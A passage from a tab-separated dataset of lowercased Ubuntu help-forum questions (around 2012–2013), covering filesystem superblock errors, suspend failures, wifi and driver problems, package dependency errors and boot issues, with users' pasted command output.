bytes disk identifier : 0xd5d0f855 device boot start end blocks id system /dev/sda2 2048 181475797 90736875 83 linux /dev/sda3 181477376 230219775 24371200 83 linux /dev/sda4 230219776 234440703 2110464 82 linux swap / solaris no os has been found on this computer . =================== recommended repair recommended-repair this setting will not act on the mbr . the boot flag will be placed on sda3 . parted /dev/sda set 3 boot on information : you may need to update /etc/fstab . boot successfully repaired . you can now reboot your computer . after googling i came up with some solutions that did n't work for me , like runnig the command : sudo e2fsck -f -y -v /dev/sda2 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_open2 : bad magic number in super-block e2fsck : superblock invalid , trying backup blocks ... e2fsck : bad magic number in super-block while trying to open /dev/sda2 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > i tried the following : sudo mke2fs -n /dev/sda2 and the output is : mke2fs 1.42.5 ( 29-jul-2012 ) filesystem label= os type : linux block size=4096 ( log=2 ) fragment size=4096 ( log=2 ) stride=0 blocks , stripe width=0 blocks 5677056 inodes , 22684218 blocks 1134210 blocks ( 5.00 % ) reserved for the super user first data block=0 maximum filesystem blocks=0 693 block groups 32768 blocks per group , 32768 fragments per group 8192 inodes per group superblock backups stored on blocks : 32768 , 98304 , 163840 , 229376 , 294912 , 819200 , 884736 , 1605632 , 2654208 , 4096000 , 7962624 , 11239424 , 20480000 so i tried to restore the superblock from the backups , and use : sudo e2fsck -b backup_number /dev/sda2 but nothing , using all the backup numbers , i always get : e2fsck 1.42.5 ( 29-jul-2012 ) e2fsck : bad magic number in super-block while trying to open /dev/sda2 the superblock could not be read or does not describe a correct ext2 filesystem . if the device is valid and it really contains an ext2 filesystem ( and not swap or ufs or something else ) , then the superblock is corrupt , and you might try running e2fsck with an alternate superblock : e2fsck -b 8193 < device > another thing that might cast a light on the issue , the output of cat /etc/fstab is the following : overlayfs / overlayfs rw 0 0 tmpfs /tmp tmpfs nosuid , nodev 0 0 /dev/sda4 swap swap defaults 0 0 and the output of df -h is : filesystem size used avail use % mounted on /cow 1.5g 87m 1.4g 6 % / udev 1.5g 4.0k 1.5g 1 % /dev tmpfs 606m 800k 606m 1 % /run /dev/sr0 694m 694m 0 100 % /cdrom /dev/loop0 665m 665m 0 100 % /rofs tmpfs 1.5g 16k 1.5g 1 % /tmp none 5.0m 4.0k 5.0m 1 % /run/lock none 1.5g 88k 1.5g 1 % /run/shm none 100m 12k 100m 1 % /run/user and the output of ls -l /dev/ | grep sd is : brw-rw -- -- 1 root disk 8 , 0 jan 25 08:45 sda brw-rw -- -- 1 root disk 8 , 2 jan 25 09:21 sda2 brw-rw -- -- 1 root disk 8 , 3 jan 25 08:45 sda3 brw-rw -- -- 1 root disk 8 , 4 jan 25 08:45 sda4 and of sudo mount -t ext4 /dev/sda2 /mnt is mount : wrong fs type , bad option , bad superblock on /dev/sda2 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so so i tried dmesg | tail and get this : [ 99.193167 ] iwl3945 0000:05:00.0 : > loaded firmware version 15.32.2.9 [ 99.262755 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 99.263044 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 102.005042 ] e1000e : eth0 nic link is up 1000 mbps full duplex , flow control : none [ 102.005304 ] ipv6 : addrconf ( netdev_change ) : eth0 : link becomes ready [ 698.685105 ] cfg80211 : found new beacon on frequency : 2467 mhz ( ch 12 ) on phy0 [ 2469.909127 ] ce : hpet increased min_delta_ns to 20113 nsec [ 2469.909743 ] ce : hpet increased min_delta_ns to 30169 nsec [ 2469.910446 ] ce : hpet increased min_delta_ns to 45253 nsec [ 2659.480451 ] ext4-fs ( sda2 ) : vfs : ca n't find ext4 filesystem and finally sudo parted -l and get : model : ata hitachi hts54161 ( scsi ) disk /dev/sda : 120gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 2 1049kb 92.9gb 92.9gb primary 3 92.9gb 118gb 25.0gb primary ext4 boot 4 118gb 120gb 2161mb primary linux-swap ( v1 ) warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk !
247439	suspend problems - chromebook running 12.04.1 lts	i 've been running ubuntu 12.04.1 lts for a few days now on my acer c7 chromebook - and in general it 's running great . however , i 've noticed that when i try to suspend one of various things can happen : sometimes everything is fine . sometimes it does n't enter suspend and i take my laptop out of my bag to find it roasting hot - not good ! . sometimes when i open the lid again it performs a complete reboot - losing all my work ! also , not good ! . basically , it leaves me in a position of uncertainty about closing my laptop without powering it down and saving all my work ! can someone please provide me with some help , resources to help or pointers to looking into the problems . thanks very much , i really want to get on board with ubuntu - other than this my experience has been great - but this is a major problem for me at the moment . edit : here are some more observations : when i click on 'suspend ' ( under the top right 'gear/cog ' icon in ubuntu ) the laptop correctly enters suspend mode and the orange light starts to pulse . if i wait a few moments ( just to ensure that suspend starts correctly ) and then press a keyboard key the suspend light turns blue.. and then off . the laptop has now completely powered down . it appears it enters suspend okay but then dies when trying to resume . really need this to work as currently ubuntu is useless for me as a portable os without suspend/resume .
247440	why ca n't i access my desktop after installing lubuntu ?	i installed lubuntu 12.10 in my netbook through usb drive . now i can not get access in my desktop after login . i can see only one thing on my screen . welcome to ubuntu 12.10 ( gnu/linux 3.5.0-17- generic i686 , 0 packages can be updated 0 updates are security updates . sumit @ sumit-hp-mini : ~ $
247441	how to manuall install/integrate binary application ?	so i have a binary application that works . what should i do to get `` full '' integration with kubuntu ? ( info about ubuntu specific steps should help too ) things i would like to achieve : placing app files in location allowing running it by every user present in system adding entry to main applications menu adding entry to context menu integrating with mime integrating with app launchers ( like alt+f2 for kde ) what ever else you can think of ... or maybe i should suffer a bit more and prepare whole package for easy installation and removal ? ( currently i need to launch it by supplying full path to executable ) p.s . there is already question : how integrate manually installed app into the desktop ? but it only deals with shortcut ( application menu ) creation , for applications `` placed '' in user home folder .
247444	how to start nautilus-dropbox with gnome and kfilebox with kde ?	i use ubuntu/kubuntu 12.10 with kde 4.10 and unity , switching beetween the two depending on what i intend to do . my question is : how can i make sure that the package nautilus-dropbox is only started when i login into unity and when logging in into kde only kfilebox is started ?
247446	num pad blinks all time	i use ubuntu 12.10 on acer notebook . now the problem is when i connect external keyboard to notebook , numlock blinks all time , and i ca n't use num-pad numbers . problem exists with both external keyboards , and both are genius . and keyboards are connected to computer via usb . what could be the problem for that ?
247448	nvidia gtx 680 drivers	i 'm trying to install ubuntu 12.10 on my pc . but i can not find the correct drivers for my videocard . i tried all the drivers in software sources . and i also tried a couple ppas . my other computer with a nvidia gtx 650 works great with the ubuntu-x-swat ppa . do any of you know how to get the videocard to work ? thanks in advanced .
247452	how to restrict a user from accessing a particular application ?	i want to restrict an application being opened under ordinary privileges . only root shall run the application , so that contents wont be seen by others and they wont change anything .
247454	canon mf-3010 printer driver not found !	i am using ubuntu 12.10 x64 and canon mf-3010 printer . how will i use it ? in printers it could n't find any driver . in recommended driver it did n't work . is there any way to solve it ?
247455	how can i get my usb wifi to work after a reboot ?	i have a desktop pc with win 7 and ubuntu 12.04 and default grub , also , i have a wifi usb adapter plugged which automatically connect to my personal wifi . my problem is this : when i boot into win 7 the wifi works fine , then i reboot to ubuntu and the wifi does n't work automatically . is fixed if i plug the usb-wifi out and in again . weird thing is if i reboot from ubuntu to ubuntu ( and the wifi was working ) it connects automatically as it should . if i reboot from ubuntu to ubuntu and the wifi was not working it wont connect automatically . so theres seems to be 'something ' that messes up things in the very moment i boot to windows 7 via grub . ¿how to fix that ? i constantly change from one system to another so is quite annoying to plug the usb in and out every time . hardware info : usb wifi adapter : tp-link tl-wn321g v4 using chipset : `` id 148f:2070 ralink technology , corp. rt2070 wireless adapter '' ( got it from $ lsusb ) it works via the driver : rt2800usb this is a fresh install jan 23 2013 fully up to date . i have this problem since 12.04 came out , and 12.10 wont fix it . when the usb wifi is not working it still detects it : $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 003 : id 046d : c52f logitech , inc. wireless mouse m305 bus 002 device 004 : id 4971 : ce04 simpletech bus 002 device 005 : id 04cf:0022 myson century , inc. ocz alchemy series elixir ii keyboard bus 002 device 006 : id 148f:2070 ralink technology , corp. rt2070 wireless adapter then i unplug and plugin again : $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0020 intel corp . integrated rate matching hub bus 002 device 003 : id 046d : c52f logitech , inc. wireless mouse m305 bus 002 device 004 : id 4971 : ce04 simpletech bus 002 device 005 : id 04cf:0022 myson century , inc. ocz alchemy series elixir ii keyboard bus 002 device 007 : id 148f:2070 ralink technology , corp. rt2070 wireless adapter and there is that small change . edit 1 : after some reading i got additional information : ( this happens when the wifi wont connect ) $ sudo ifup wlan0 [ sudo ] password for marcos : ignoring unknown interface wlan0=wlan0 . $ iwconfig lo no wireless extensions . wlan0 ieee 802.11bg essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on eth0 no wireless extensions . $ ifconfig wlan0 wlan0 link encap : ethernet direcciónhw < hidden mac address > activo difusión multicast mtu:1500 métrica:1 paquetes rx:0 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:0 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) and this are the changes after i unplug and re-plug the usb wifi $ iwconfig wlan0 wlan0 ieee 802.11bg essid : '' red de lourdes '' mode : managed frequency:2.412 ghz access point : < hidden mac address > bit rate=54 mb/s tx-power=20 dbm retry long limit:7 rts thr : off fragment thr : off power management : on link quality=59/70 signal level=-51 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:145 invalid misc:96 missed beacon:0 $ ifconfig wlan0 wlan0 link encap : ethernet direcciónhw < hidden mac address > direc . inet : < hidden ip address > difus . : < hidden ip address > másc : < hidden ip address > dirección inet6 : < hidden ipv6 address > alcance : enlace activo difusión funcionando multicast mtu:1500 métrica:1 paquetes rx:2108 errores:0 perdidos:0 overruns:0 frame:0 paquetes tx:2259 errores:0 perdidos:0 overruns:0 carrier:0 colisiones:0 long.colatx:1000 bytes rx:845327 ( 845.3 kb ) tx bytes:395596 ( 395.5 kb ) any way to make a bash script to get the wireless to work ? any other solution ? is the grub at fault here ?
247456	are dconf values for 'top-panel ' and 'bottom-panel ' used by gnome shell ?	gnome shell 3.6.2 ubuntu 12.10 64 bit /org/gnome/gnome-panel/layout/toplevels/bottom-panel has several options theoretically to customize the behavior of gnome panels . i tried to set that the bottom bar is showed faster and that it is automatically hidden . for this i changed the settings as shown below in the screenshot : i restarted the gnome environment with alt+f2+r , but it does n't work .
247457	problem with vga and kernels	i 'm trying to do a clean installation of ubuntu 12.10 in my desktop computer . i have an ati/amd hd 6450 i tried the live-cd and it worked well so i proceed with the installation . it finished ok. and when log in ok too but when do update and upgrade the kernel from defual one 3.5.0-17 to latest one and reboot screen keeps blinking with only one multicolor line at the top . and try to install version of kernel but face same problem only this kernel boot perfect ( 3.5.0-17 to 3.5.0-21 ) any veriosn make problen and tried to download latest version of kernel from kernel.org ( 3.7.1 ) same problem too happened so i remove this distro and install the long term support is 12.04 but this version make same problem in first boot i wan na ask why do that i can before install all version and all kernel without any problem with open source vga card but now i ca n't why that ? number 2 i feel that ubuntu is heavy on my computer although i have 4gb ram and 3 core in my processor and have ati 6450 here is video for this problem and sorry for bad quailty http : //www.youtube.com/watch ? v=akhkzghbpx0 i post my problem as bug here https : //bugs.launchpad.net/ubuntu/+source/linux/+bug/1098722 last thing i found strange somthing today that in kernel 3.5.0-22 when boot from it directly make problem that i told it but when i do suspend of course computer turn off and then when i switch of it 's work i do n't know why
247461	how do i fix a `` ca n't access dropbox folder '' error ?	i 'm having a rather strange problem with dropbox that started a few weeks ago . dropbox will stop syncing with the message `` ca n't access dropbox folder '' , and refuse to sync until i reboot . i 've tried restarting dropbox and logging out , but nothing i seem to do will allow it to sync again short of a reboot . this is not a permissions problem , as the permissions do n't change when i suddenly lose access . i 've checked lsof for anything related to dropbox that might still be hanging on when i stop it . as far as i can tell nothing else other than dropbox is accessing it 's folders when this happens .
247464	how do i troubleshoot this dd error when copying image to sd card ?	i 'm trying to follow the instructions in this answer on how to copy the ubuntu image to an sd card for the raspberry pi . i get the following error using the imagewriter application : trying to unmount /dev/mmcblk0p1 ... /dev/mmcblk0p1 successfully unmounted executing : dd if=/media/ewilson/kingston/2012-08-08-wheezy-armel.img of=/dev/mmcblk0 the dd process ended with an error ! i have no idea how to troubleshoot this . any ideas ?
247466	conky is too high in the top right	xubuntu 12.10 de : xfce so i started this conky script http : //conky.sourceforge.net/conkyrc-brenden ( it is the very first .conkyrc file i nthe top left on http : //conky.sourceforge.net/screenshots.html ) and i only changed the font to poly and the alignment to top_right . that 's all . but now it literally is too high in the top , i ca n't see the first line ( whatever it says -- i do n't know ) . although i am aware of http : //conky.sourceforge.net/variables.html and http : //conky.sourceforge.net/config_settings.html i am pretty clueless . what do i do ? : )
247471	what is the best way to add some configuration to bashrc ?	i 'm currently trying to configure a server using precise pangolin and vagrant ( a software allowing me to provision a number of software when booting my vm ) . my current question is a pure bash one . i 've discovered that my .bashrc file is already filled with interesting commands . i want , in a way or another , to add this cool maven.bashrc colorizing to my bash . how can i do that without hand-editting my .bashrc ? notice i can ( and in fact already have ) write files into /etc/profile.d . is it recommended for that kind of stuff ?
247472	package dependencies can not be resolved for vlc	i tried to install vlc media player on my ubuntu 12.04 using terminal by following command : sudo add-apt-repository ppa : videolan/stable-daily sudo apt-get update sudo apt-get install vlc and got an reply of reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.5+git20130123+r508-0~r42~precise1 ) but it is not going to be installed depends : libavcodec53 ( > = 4:0.8-1~ ) but it is not installable or libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not installable depends : libavutil51 ( > = 4:0.8-1~ ) but it is not installable or libavutil-extra-51 ( > = 4:0.8-1~ ) but it is not installable depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not installable depends : libtar0 but it is not installable depends : libva-x11-1 ( > 1.0.15~ ) but it is not installable depends : libva1 ( > 1.0.15~ ) but it is not installable depends : libxcb-composite0 but it is not installable depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not installable depends : libxcb-randr0 ( > = 1.1 ) but it is not installable depends : libxcb-xv0 ( > = 1.2 ) but it is not installable recommends : vlc-plugin-notify ( = 2.0.5+git20130123+r508-0~r42~precise1 ) but it is not going to be installed recommends : vlc-plugin-pulse ( = 2.0.5+git20130123+r508-0~r42~precise1 ) but it is not going to be installed then i tried it using software centre then here comes its reply the following packages have unmet dependencies : vlc : depends : vlc-nox ( = 2.0.5+git20130123+r508-0~r42~precise1 ) but 2.0.5+git20130123+r508-0~r42~precise1 is to be installed depends : libavcodec-extra-53 ( > = 4:0.8-1~ ) but it is not going to be installed depends : libavutil-extra-51 ( > = 4:0.8-1~ ) but it is not going to be installed depends : libc6 ( > = 2.15 ) but 2.15-0ubuntu10 is to be installed depends : libfreetype6 ( > = 2.2.1 ) but 2.4.8-1ubuntu2 is to be installed depends : libgcc1 ( > = 1:4.1.1 ) but 1:4.6.3-1ubuntu5 is to be installed depends : libqtcore4 ( > = 4:4.8.0 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libqtgui4 ( > = 4:4.7.0~beta1 ) but 4:4.8.1-0ubuntu4.2 is to be installed depends : libsdl-image1.2 ( > = 1.2.10 ) but it is not going to be installed depends : libstdc++6 ( > = 4.6 ) but 4.6.3-1ubuntu5 is to be installed depends : libtar0 but it is not going to be installed depends : libva-x11-1 ( > 1.0.15~ ) but it is not going to be installed depends : libva1 ( > 1.0.15~ ) but it is not going to be installed depends : libxcb-composite0 but it is not going to be installed depends : libxcb-keysyms1 ( > = 0.3.8 ) but it is not going to be installed depends : libxcb-randr0 ( > = 1.1 ) but it is not going to be installed depends : libxcb-xv0 ( > = 1.2 ) but it is not going to be installed depends : zlib1g ( > = 1:1.2.3.3.dfsg ) but 1:1.2.3.4.dfsg-3ubuntu4 is to be installed now what to do pls help me
247475	automounted usb devices are read only	since i upgraded to ubuntu 12.10 the automout of usb devices does not work as expected . when i plug in a storage device it is recognized correctly but i do not have write privileges on it . i thought , that maybe the permissions of /media are not correctly set , but i do n't know , how they have to be . they are like this : drwxr-xr-x 14 root root 4096 jan 13 19:37 media i also checked whether my user is a member of the group plugdev and he definitely is . what else could be the cause of that problem ? update : here is the dmesg output after plugging in an usb storage device : http : //pastebin.com/pj7qebqr
247479	how do i check whether a ppa package has been tampered with ?	i want to use a recent package from a ppa . how do i make sure that the ppa maintainer has n't added any malicious code in the version provided there ?
247481	sync folder with android via lan or usb	i am trying to keep my music folder synced between my ubuntu desktop and my android phone . both my devices are usually connected via lan . i do n't wan na use internet to sync . how can i do this ? thanks in advance .
247482	problem installing ubuntu 12.04..stuck at install screen	while trying to install ubuntu 12.04 after putting my wi-fi code in and press continue it doesent do anything the curser turns in to the ball that spins and doesent do anything else ... i left it for 2 hours and still nothing : (
247483	ubuntu.components qml module	i installed qtcreator and ubuntu sdk as shown here . when trying to run the code sample provided here , qtcreator tells me it ca n't find the ubuntu.components qml module . notes : the build-logs says : file : ///home/giladnaaman/programming/projects/currencyconverter/currencyconverter.qml:2 module `` ubuntu.components '' is not installed but the directory /opt/qt5/imports/ubuntu/components exists ( and is full of files ) . after adding importpaths : [ `` /opt/qt5/imports '' ] to the qmlproject file : qml module does not contain information about components contained in plugins . qmetatype : :registertype : binary compatibility break -- type flags for 'qpaintbuffercacheentry ' [ 1024 ] do n't match . previously registered typeflags ( 0x103 ) , now registering typeflags ( 0x3 ) .
247484	mac wo n't boot into os x after update	i run an update today on my mac and it updated grub . i select it to leave it and not update it however when i reboot , refit did n't appear and went straight to grub . i can boot into ubuntu but not into os x . when i shutdown and then turn the power back on while holding the option key it does nothing and goes straight to the grub menu . i really need to get back to my os x partition so any help would be greatly appreciated . thanks , jorden
247490	ubuntu on nexus 7 vs. ubuntu on galaxy nexus	i can find already a lot of material about ubuntu on nexus 7 . this is all very exciting and even the average user is able to install ubuntu on a nexus 7 and play around with it . https : //wiki.ubuntu.com/nexus7 on the other side there were quite a good amount of presentations by mark shuttleworth of ubuntu on galaxy nexus . videos presentation , ces , youtube , etc . ubuntu on galaxy nexus : http : //www.youtube.com/watch ? v=sltcj7fdiya i am wondering how this goes together . if there is already a working preview on galaxy nexus , why is this not already an active/public development platform for ubuntu ?
247491	wireless network not working after reboot	it looks strange . when installing ubuntu 12.10 , the wireless network is ok . however , after installing and restarting , there is no available network . windows 7 is also installed , and ubuntu is installed after windows 7 . every time i start windows 7 , the wireless network is ok. how to access the wireless network ?
247501	i get `` failed to load session `` ubuntu-2d '' when using xrdp	initially , when i try to log in to my ubuntu machine ( version 12.10 ) using rdp , i would get an ubuntu desktop background , with no text , menu bars , or anything to indicate it loaded the desktop . i went through the following instructions that claimed to fix that issue : edit the .xsession file to add the following line : gnome-session âsession=ubuntu-2d but it caused the following error : failed to load session `` ubuntu-2d and it only allows me to log out . so now , my question is : how to i log in to my ubuntu desktop using xrdp in a foolproof fashion . i can successfully ssh in to the command line , so do i need to install another window manager ? do i need to reset some settings ?
247502	why does my optical drive not play commercial dvds ?	i 'm very new to ubuntu having just replaced a faulty windows 7 on my sony viao . i now find that my dvd drive will not play commercial movie dvds . i have loaded the recommended files . i can use home-made dvd-r no problem , but with the commercial dvds , the drive makes a loud clicking noise and eventually stops without vlc opening . on a single layer movie disc , vlc reported a blank disc . any ideas ?
247506	booting ubuntu from a usb stick	i have tried to boot from a usb drive using three different programs , linuxlive usb creator , universal usb creator , and unetbootin . i am using a dell latitude e5410 running windows 7 and am trying to install ubuntu 12.04 . each time i select boot from usb device , i get to a menu with options to try ubuntu without installing , boot into ubuntu , and install on hard disk . no matter which option i choose my screen goes to a not-quite-black color and nothing happens . i have to disconnect my laptop from its power source to restart it . i was wondering if there might be a problem with my usb stick ( sandisk cruzer 8gb ) . i tried using the `` check drive for errors '' option from my computer - > removable disk ( f : ) - > properties - > tools but it said no error found . it was suggested to me that this might be a problem with my video card . my video card is an intel ( r ) graphics media accelerator hd ( core i5 ) . any suggestions would be greatly appreciated .
247507	booting impossible cause grub rescue wo n't let me	i created two bootable usb : lubuntu 12.10 and ubuntu 12.04 from my windows machine . scene 1 i installed ubuntu 12.04 , everything is fine . a popup window appears that says something like `` i have successfully installed the operating system and a reboot is required . '' i am about to click the reboot now button , when the electricity went off ( no laptop battery ) ! now i boot back , and found out that my ubuntu will only normally boot if the usb is plugged in , if i removed it , only the blinking insert cursor will just be there for me . scene 2 with my crazy mind , i thought of installing the lubuntu 12.04 so it will forget memories of ubuntu 12.04 . i inserted the usb and there goes the installation . all went well , i played with lubuntu for a couple of hours . but then , my consciousness reminds me : i want my ubuntu back . scene 3 once more , i inserted the ubuntu 12.04 . i miss the violets , so i expected that much i 'll see it . but then , i am a failure . here is this shitty grub rescue that keeps telling me error blah , blah . scene 4 nowhere to go , booted back to lubuntu 12.10 . type my story here and hoping someone will lead me back to my home ... ubuntu .
247508	black screen when trying to play video games	i run a wined version of steam ( mostly because most of my steam games are n't avaible on the steam beta yet ) and i had problems in the past with this black screen/dim screen but i fixed it , the problem is that whenever i try to run a game in full screen mode , the screen goes extremly dark again [ can still hear sounds and see a few bright parts , especially with a lamp turned on ] . i do n't want to play games in a small window forever , but i do n't want to go back to windows either . information : acer aspire 5732z [ laptop ] , intel pentium processor t4400 ( 2.2ghz , 800 mhz fsb ) , intel gma 4500m , 2gb ram , 250 gb hdd i had same problem when i installed ubuntu ( 11.10 ) first time on my laptop , i fixed it with the command sudo setpci -s 00:02.0 f4.b=01 after that i used gksudo gedit /etc/rc.local and added the setpci -s 00:02.0 f4.b=01 after exit 0 .
247510	make gnome 3 favorites launch a new window with left mouse button	left-clicking the icon of a running application on the gnome 3 favorites panel switches focus to a running instance of that program . right-clicking brings up a menu with a `` new window '' option . is there a way to make that the default behavior ? i mostly use the favorites for launching new terminals .
247523	what is swap and usage ?	my question is what is swap ? i am planning to install ubuntu 12.10 version . i have 2.5 gigabytes of ram and want to use it all . how do i do the right way . i plan to use 500 gigabytes and a sempron core processor . do i need the swap ?
247525	how to create bootable usb without administrator rights ?	i would like to use the work computer to create the bootable usb i need bootable usb disk for my home computer . i 'm not administrator on the work computer , so i ca n't execute the installer . is there another way ?
247530	associate .mm files with freeplane	i use freeplane mind-mapping software . it creates .mm files which nautilus reports as troff mm input document . i want to be able to open a file with freeplane by double-clicking it in nautilus . i have a .desktop file for freeplane with the mime-type set as application/x-freemind . i added a mime-type for *.mm files as application/x-freemind but this did n't change anything . right-click open withâś still does n't show freeplane . freeplane is installed in a folder under home simply by unzipping an archive and adding a .desktop file under ~/.local/share/applications pointing to the freeplane.sh script file . how do i associate .mm files to freeplane . i 'm using ubuntu quantal quetzal .
247531	can i respond to comments in software center as app developer ?	is there anyway to respond to some comments privately on the ubuntu software center ? some users of my app seem to be having problems but have not filed bug reports or asked questions on the launchpad support page that would easily clear up their issues .
247539	how can i change the keyboard shortcuts for single line scrolling in the terminal ?	to scroll a single line in gnome-terminal you have to press ctrl-shift-↑ or ctrl-shift-↓ in ubuntu . in other distributions ( e.g . xubuntu ) you only have to press shift-↑ or shift-↓ for the same behaviour . i would like to change the shortcuts in ubuntu to work the same , but so far i have n't found an option or config file to change . the reason why i would like to change this are two-fold : first , i find it more convenient ( not having shift and ctrl above each other on a thinkpad ) . second , it is more consistent to the shortcuts for scrolling an entire page ( shift-pgup and shift-pgdown ) . also , i remember reading the reason behind using ctrl-shift instead of just shift , but i can not locate that discussion anymore .
247541	gave up waiting for root device on ubuntu	i 've just installed ubuntu 12.10 to dual boot with windows 8 , but every time i choose ubuntu from grub menu , it always get stuck at this error and wo n't boot : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) - check rootdelay= ( did the system wait long enough ? ) - check root= ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/920903aa-762f-40d2-8126-87f4b0e6f975 does not exist . dropping to a shell ! busybox v1.19.3 ( ubuntu 1:1.10.3-7ubuntu1.1 ) built-in shell ( ash ) enter 'help ' for a lost of built-in commands . ( initramfs ) i tried with boot-repair , but it does n't help , here is the log generated it .
247546	visual alerts do n't work	when i go to universal access - > hearing tab - > turn visual alerts on and try test flash with either the option to flash the window title or to flash the entire screen , nothing happens . i 'm on 12.10 quantal quetzal 64 bit with 3.5.0-22-generic . also , see my related question about audio alerts .
247547	vmware player 5.0.1 and kernel 3.7 will not complile	i downloaded current version of vmware player . i have kernel 3.7 . when starting , it asked me to tell where the kernel was located . so vmware kernel modules did not compile .
247549	is it possible to undo an apt-get install command ?	i installed carpadio on my xubuntu install ( a live usb ) , which then pulled like over 50 packages from , i suppose , the ubuntu side of the repository . now i would like to undo this . however for all my hunting , i ca n't find anything more useful than how can i reverse sudo apt get install command , which just suggests apt-get purge . this is not useful since all it does is remove 2 packages ( carpadio and carpadio-gnomepanel ) . /var/log/apt/history.log has a list of all the packages that was installed along with that command . so i was wondering if there is any easy way to go about removing all of them ? else i can just reinstall , this was a fresh install anyway , but i am curious . a small sample of the history log ( 1/5-1/10 of the entire list ) commandline : apt-get install cardapio-gnomepanel install : libdbusmenu-qt2 : amd64 ( 0.9.2-0ubuntu1 , automatic ) , python-packagekit : amd64 ( 0.7.2-4ubuntu3 , automatic ) , cups-pk-helper : amd64 ( 0.2.1.2-1ubuntu0.1 , automatic ) , geoclue : amd64 ( 0.12.0-1ubuntu12 , automatic ) , unity : amd64 ( 5.18.0-0ubuntu1 , automatic ) , indicator-printers : amd64 ( 0.1.6-0ubuntu1 , automatic ) , libevolution : amd64 ( 3.2.3-0ubuntu6 , automatic ) , libqt4-declarative : amd64 ( 4.8.1-0ubuntu4.3 , automatic ) , libmtp9 : amd64 ( 1.1.3-1ubuntu0.1 , automatic ) , tracker-miner-fs : amd64 ( 0.14.0-2ubuntu1 , automatic ) , gir1.2-rb-3.0 : amd64 ( 2.96-0ubuntu4.2 , automatic ) , python-aptdaemon.pkcompat : amd64 ( 0.43+bzr805-0ubuntu7 , automatic ) , gnome-media : amd64 ( 3.4.0-0ubuntu3.1 , automatic ) , metacity : amd64 ( 2.34.1-1ubuntu11 , automatic ) , nautilus : amd64 ( 3.4.2-0ubuntu6 , automatic ) , libcompizconfig0 : amd64 ( 0.9.7.0~bzr428-0ubuntu6 , automatic ) , compiz-plugins-default : amd64 ( 0.9.7.12-0ubuntu1 , automatic ) , libunistring0 : amd64 ( 0.9.3-5 , automatic ) , libebackend-1.2-1 : amd64 ( 3.2.3-0ubuntu7 , automatic ) , ubuntu-docs : amd64 ( 12.04.6 , automatic ) , python-mako : amd64 ( 0.5.0-1 , automatic ) , to all those who have suggested autoremove : i am not sure why , but i got just 1 other python related package ( python-keybinder or something ) as `` unnecessary '' and that is all that autoremove was able to remove . between the install and uninstall , only major change was installing xubuntu-restricted-extras .
247551	kinect + webcam - bandwidth issue	i am making an application on ubuntu 12.04 and ros fuerte ( robot operating system ) using the microsoft kinect sensor and a logitech webcam . both work perfectly fine independently . for information i use the openni driver for kinect . the problem comes when using the kinect and the webcam at the same time , where only the webcam works in that case . trying every possible configuration of usb ports did n't help . now i have couple more information about my problem . here is the lsusb report . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 002 : id 18e8:6229 qcom rt2573 bus 001 device 003 : id 0409:005a nec corp. highspeed hub bus 001 device 004 : id 1a40:0101 terminus technology inc. 4-port hub bus 001 device 005 : id 058f:6254 alcor micro corp. usb hub bus 001 device 006 : id 045e:02b0 microsoft corp. xbox nui motor bus 001 device 007 : id 046d : c518 logitech , inc. mx610 laser cordless mouse bus 001 device 008 : id 05ac:1002 apple , inc. extended keyboard hub [ mitsumi ] bus 001 device 009 : id 067b:2303 prolific technology , inc. pl2303 serial port bus 001 device 010 : id 046d:082c logitech , inc . bus 001 device 011 : id 0451:2077 texas instruments , inc. tusb2077 hub bus 001 device 012 : id 05ac:0204 apple , inc . bus 001 device 013 : id 045e:02ad microsoft corp. xbox nui audio bus 001 device 014 : id 06c2:0033 phidgets inc. ( formerly glab ) bus 001 device 015 : id 06c2:0059 phidgets inc. ( formerly glab ) bus 001 device 016 : id 06c2:004f phidgets inc. ( formerly glab ) bus 001 device 017 : id 06c2:0045 phidgets inc. ( formerly glab ) phidgetinterface kit 8-8-8 bus 001 device 018 : id 045e:02ae microsoft corp. xbox nui camera i know that the simple way would be to change the hardware . but i know that the same set up works fine on windows . now i have a few questions : it seems i have only one usb 2.0 bus and a few usb 1.1 buses , is that common ? or would it be a problem with the os recognizing the other usb 2.0 buses ? i had the confirmation that the 